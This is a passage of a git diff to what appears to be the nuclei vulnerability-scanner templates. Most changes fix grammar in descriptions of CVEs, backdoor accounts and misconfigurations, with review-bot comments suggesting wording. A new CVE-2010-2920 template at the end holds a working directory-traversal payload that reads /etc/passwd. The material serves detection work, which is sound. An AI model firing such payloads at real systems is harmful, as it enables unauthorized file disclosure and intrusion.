diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index fd2fcf9241..08d43a9cd4 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -3,7 +3,7 @@ info: name: UnRaid Remote Code Execution author: madrobot severity: high - description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code. + description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index e4043100bf..d08e8d811a 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2020,rce - description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2. + description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index 3e012c49bd..c9f38d9a42 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml 
@@ -2,7 +2,7 @@ id: CVE-2020-9402 info: name: Django SQL Injection - description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. reference: - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index a03934277c..2336c16344 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml 
@@ -3,7 +3,7 @@ info: name: rConfig Unauthenticated Sensitive Information Disclosure author: madrobot severity: high - description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. + description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. reference: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 9b852d57e9..4e9eb24eec 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ - description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin. + description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce requests: diff --git a/cves/2021/CVE-2021-28854.yaml b/cves/2021/CVE-2021-28854.yaml index 4a9b0724e2..0cf3986bfe 100644 --- a/cves/2021/CVE-2021-28854.yaml +++ b/cves/2021/CVE-2021-28854.yaml 
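Review bot: The rewritten CVE-2021-21972 description still reads `This templates only detects the plugin.`, so the line the commit touches keeps its grammatical error, and it is the one sentence that tells an operator a match is not proof of exploitability. Suggest `description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This template only detects the presence of the plugin; it does not attempt the upload or confirm code execution.` That keeps the detection-only caveat explicit next to the `critical` severity.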
@@ -4,7 +4,7 @@ info: name: VICIdial - Multiple sensitive Information disclosure author: pdteam severity: high - description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21 + description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021. reference: https://github.com/JHHAX/VICIdial tags: cve,cve2021 diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index 0426b0eee2..b64016ff6a 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml 
@@ -3,7 +3,7 @@ id: CVE-2021-33221 info: name: CommScope Ruckus IoT Controller Unauthenticated Service Details author: geeknik - description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf severity: medium tags: cve,cve2021,commscope,ruckus,debug diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 951b8b696c..800d8aef3a 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -4,7 +4,7 @@ info: author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. reference: https://glpi-project.org/ requests: diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 03d63d443f..0b0ea1c0d4 100644 --- a/dns/mx-service-detector.yaml 
+++ b/dns/mx-service-detector.yaml @@ -4,7 +4,7 @@ info: name: E-mail service detector author: binaryfigments severity: info - description: Check the email service or spamfilter that is used for a domain. + description: Check the email service or spam filter that is used for a domain. tags: dns dns: diff --git a/exposures/files/yarn-lock.yaml b/exposures/files/yarn-lock.yaml index f2b729f35b..d75da95303 100644 --- a/exposures/files/yarn-lock.yaml +++ b/exposures/files/yarn-lock.yaml @@ -4,7 +4,7 @@ info: name: yarn lock file disclosure author: oppsec severity: info - description: yarn.lock is a file which store all exactly versions of each dependency were installed. + description: The yarn.lock file stores the versions of each Yarn dependency installed. tags: exposure requests: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 802ed499db..40ef7fe623 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -3,7 +3,7 @@ info: name: iis-shortname author: nodauf severity: info - description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. + description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~. tags: fuzz reference: diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml index 2f33447a4c..dccb08d14b 100644 --- a/iot/kevinlab-device-detect.yaml +++ b/iot/kevinlab-device-detect.yaml 
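Review bot: The new iis-shortname description still carries the misspelling `.Net Framwork` and the ungrammatical `it's possible to enumeration folder`, so the line is reworded but not actually fixed. Suggest `description: When IIS runs on an old .NET Framework it is possible to enumerate short folder names using the tilde (~) character.` The template id (`iis-shortname`) presumably refers to the 8.3 short-name technique; if so, naming it in the description would help readers map the finding to the known issue.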
@@ -2,7 +2,7 @@ id: kevinlab-device-detect info: name: KevinLAB Devices Detection - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. author: gy741 severity: info tags: iot diff --git a/iot/xp-webcam.yaml b/iot/xp-webcam.yaml index f9942032ad..f7578077c4 100644 --- a/iot/xp-webcam.yaml +++ b/iot/xp-webcam.yaml @@ -4,7 +4,7 @@ info: name: XP Webcam Viewer Page author: aashiq severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body + description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. tags: webcam,iot requests: @@ -23,4 +23,4 @@ requests: words: - "Please provide a valid username/password to access this server." part: body - negative: true \ No newline at end of file + negative: true diff --git a/miscellaneous/google-floc-disabled.yaml b/miscellaneous/google-floc-disabled.yaml index 5db3fc078d..04184c7821 100644 --- a/miscellaneous/google-floc-disabled.yaml +++ b/miscellaneous/google-floc-disabled.yaml 
@@ -3,7 +3,7 @@ id: google-floc-disabled info: name: Google FLoC Disabled author: geeknik - description: The detected website has decided to explicity exclude itself from Google FLoC tracking. + description: The detected website has decided to explicilty exclude itself from Google FLoC tracking. reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ severity: info tags: google,floc,misc diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 1797130f74..ad0de0cd6f 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -4,8 +4,8 @@ info: name: Joomla htaccess file disclosure author: oppsec severity: info - description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... - tags: misc + description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml index 81b47737ad..99d9cb4e1a 100644 --- a/miscellaneous/joomla-manifest-file.yaml +++ b/miscellaneous/joomla-manifest-file.yaml @@ -4,8 +4,8 @@ info: name: Joomla manifest file disclosure author: oppsec severity: info - description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. - tags: misc + description: joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/moodle-changelog.yaml b/miscellaneous/moodle-changelog.yaml index c6db772dcd..8f73d5040e 100644 --- a/miscellaneous/moodle-changelog.yaml +++ b/miscellaneous/moodle-changelog.yaml 
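Review bot: The replacement line in google-floc-disabled introduces a new misspelling: `explicity` became `explicilty`, which is still wrong; the intended word is `explicitly`. Suggest `description: The detected website has decided to explicitly exclude itself from Google FLoC tracking.` The remaining lines of the hunk are context only.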
@@ -4,7 +4,7 @@ info: name: Moodle Changelog File author: oppsec severity: info - description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version. + description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version. tags: misc requests: diff --git a/misconfiguration/aem/aem-userinfo-servlet.yaml b/misconfiguration/aem/aem-userinfo-servlet.yaml index e7b1b39316..f20d99bbc1 100644 --- a/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -4,7 +4,7 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. tags: aem @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - 'application/json' \ No newline at end of file + - 'application/json' diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml index c169a53e49..72c6c61cff 100644 --- a/misconfiguration/exposed-service-now.yaml +++ b/misconfiguration/exposed-service-now.yaml @@ -4,7 +4,7 @@ info: name: ITMS-Misconfigured author: dhiyaneshDK severity: info - description: detectes misconfigured Service-now ITSM instances + description: Detection of misconfigured ServiceNow ITSM instances. reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 
diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index aef6738399..3f53d06de8 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -4,7 +4,7 @@ info: name: HTTP Missing Security Headers author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info - description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. tags: misconfig,generic requests: @@ -124,4 +124,4 @@ requests: - type: regex name: access-control-allow-headers regex: - - "(?i)access-control-allow-headers" \ No newline at end of file + - "(?i)access-control-allow-headers" diff --git a/misconfiguration/laravel-debug-enabled.yaml b/misconfiguration/laravel-debug-enabled.yaml index 06791732aa..7be14a40fd 100644 --- a/misconfiguration/laravel-debug-enabled.yaml +++ b/misconfiguration/laravel-debug-enabled.yaml @@ -2,7 +2,7 @@ id: laravel-debug-enabled info: name: Laravel Debug Enabled author: notsoevilweasel - description: Laravel with APP_DEBUG set to true prone to showing verbose errors. + description: Laravel with APP_DEBUG set to true is prone to show verbose errors. severity: medium tags: debug,laravel,misconfig @@ -19,4 +19,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index 0897da8dc9..c8dbbcea18 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml 
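Review bot: The reworded http-missing-security-headers description still ends with `could be so less generic and could be useless for Bug Bounty`, which tells the reader neither what the template checks nor how to weigh a hit. Suggest `description: Checks responses for the absence of common HTTP security headers. Results are informational and generic; a missing header is not a vulnerability by itself and must be assessed in the context of the application.` That wording matches the `severity: info` already set on the template and reduces false escalation of these findings.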
@@ -5,7 +5,7 @@ info: author: iamthefrogy severity: medium tags: network,ssh,openssh - description: SSHv1 is a deprecated and have known cryptographic issues. + description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-cred-bruteforce.yaml index a13c7b367b..213c71805a 100644 --- a/network/mysql-native-cred-bruteforce.yaml +++ b/network/mysql-native-cred-bruteforce.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: info tags: network,mysql,bruteforce,db - description: MySQL instance with enabled native password support prone vulnerable for password brute-force attack. + description: MySQL instance with enabled native password support is prone to password brute-force attacks. network: - host: diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index bd7a7338cc..1bfb60d273 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: low tags: network,openssh - description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. + description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7190b73c58..b317702918 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml 
@@ -4,7 +4,7 @@ info: name: Open URL redirect detection author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik severity: low - description: A user-controlled input redirect users to an external website. + description: A user-controlled input redirects users to an external website. tags: redirect,generic requests: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index 6e387de0fd..cf0c635784 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -4,7 +4,7 @@ info: name: CouchDB Admin Party author: organiccrap severity: high - description: Requests made against CouchDB is done in the context of an admin user. + description: Requests made against CouchDB are done in the context of an admin user. tags: couchdb requests: diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 7e05dfc26c..c6c41baad6 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -4,7 +4,7 @@ info: name: EyeLock nano NXT 3.5 - Local File Disclosure author: geeknik severity: high - description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. + description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 54619b0ce4..dd5701ed28 100644 
--- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -4,7 +4,7 @@ info: name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account author: gy741 severity: critical - description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml index ea925ce800..7d4152fc83 100644 --- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml 
@@ -4,7 +4,7 @@ info: name: KevinLAB HEMS Undocumented Backdoor Account author: gy741 severity: critical - description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,default-login,backdoor @@ -38,4 +38,4 @@ requests: - type: word words: - 'PHPSESSID' - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 4f6c12b3c8..9bb69eefdd 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml 
@@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 06555a6586..82c8b1411b 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml 
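Review bot: The new NETGEAR description is ungrammatical at `however matches the entire URL` and drops the mechanism the old text conveyed: authentication is skipped when the substring check matches anywhere in the full URL, not only in the page name. Suggest `description: NETGEAR DGN2200v1 routers skip authentication for any request whose URL contains the substrings “.jpg”, “.gif” or “ess_”. Because the check is applied to the entire URL, any page that normally requires authentication can be reached by appending a query string such as “?.gif”.` This keeps the reason the bypass works visible to whoever triages a match.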
@@ -4,7 +4,7 @@ info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index a8c7121123..51dfc17871 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml 
@@ -4,7 +4,7 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit @@ -31,4 +31,4 @@ requests: - type: word words: - "X-Application-Context" - part: header \ No newline at end of file + part: header diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index e97f2aa339..944c6b04b2 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -3,11 +3,11 @@ id: azkaban-workflow info: name: Azkaban Security Checks author: pdteam - description: A simple workflow that runs all azkaban related nuclei templates on a given target. + description: A simple workflow that runs all Azkaban related nuclei templates on a given target. tags: workflow workflows: - template: exposed-panels/azkaban-web-client.yaml subtemplates: - - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml \ No newline at end of file + - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 10db14b804..315999a816 100644 --- a/workflows/bigip-workflow.yaml 
+++ b/workflows/bigip-workflow.yaml @@ -3,7 +3,7 @@ id: bigip-workflow info: name: F5 BIG-IP Security Checks author: dwisiswant0 - description: A simple workflow that runs all Bigip related nuclei templates on a given target. + description: A simple workflow that runs all BigIP related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) @@ -14,4 +14,4 @@ workflows: - template: technologies/bigip-config-utility-detect.yaml subtemplates: - - template: cves/2020/CVE-2020-5902.yaml \ No newline at end of file + - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 6dcd34dc47..3499322be0 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -3,10 +3,10 @@ id: lucee-workflow info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk - description: A simple workflow that runs all Lucee related nuclei templates on given target. + description: A simple workflow that runs all Lucee related nuclei templates on a given target. tags: workflow workflows: - template: technologies/lucee-detect.yaml subtemplates: - - tags: lucee \ No newline at end of file + - tags: lucee diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index 97b372c544..acaad19e2b 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -1,9 +1,9 @@ id: springboot-workflow info: - name: Springboot Security Checks + name: Spring Boot Security Checks author: dwisiswant0 - description: A simple workflow that runs all springboot related nuclei templates on a given target. + description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. tags: workflow # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) 
@@ -13,4 +13,4 @@ workflows: - template: technologies/springboot-actuator.yaml subtemplates: - - tags: springboot \ No newline at end of file + - tags: springboot diff --git a/workflows/worksite-takeover-workflow.yaml b/workflows/worksite-takeover-workflow.yaml index ed95574336..41429fc2b8 100644 --- a/workflows/worksite-takeover-workflow.yaml +++ b/workflows/worksite-takeover-workflow.yaml @@ -3,10 +3,10 @@ id: worksite-takeover-workflow info: name: Worksite Takeover Workflow author: pdteam - description: A simple workflow that runs DNS based detection to filter hosts runnng worksite and do further HTTP based check to confirm takeover. + description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover. reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites workflows: - template: dns/worksites-detection.yaml subtemplates: - - template: takeovers/worksites-takeover.yaml \ No newline at end of file + - template: takeovers/worksites-takeover.yaml From 0835b26f23aa31be4222dabfc780ecbb04cde8c7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 6 Sep 2021 06:03:05 +0700 Subject: [PATCH 060/339] Create CVE-2010-2920.yaml --- cves/2010/CVE-2010-2920.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2920.yaml diff --git a/cves/2010/CVE-2010-2920.yaml b/cves/2010/CVE-2010-2920.yaml new file mode 100644 index 0000000000..48974bc25f --- /dev/null +++ b/cves/2010/CVE-2010-2920.yaml 
@@ -0,0 +1,27 @@
+id: CVE-2010-2920
+
+info:
+ name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12120
+ - https://www.cvedetails.com/cve/CVE-2010-2920
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From 75bee6e8f5aadd8374d8de5aea8cf73ce48a4cad Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 6 Sep 2021 07:00:44 +0700
Subject: [PATCH 061/339] Create CVE-2010-1472.yaml
---
cves/2010/CVE-2010-1472.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 cves/2010/CVE-2010-1472.yaml
diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml
new file mode 100644
index 0000000000..4294244baf
--- /dev/null
+++ b/cves/2010/CVE-2010-1472.yaml
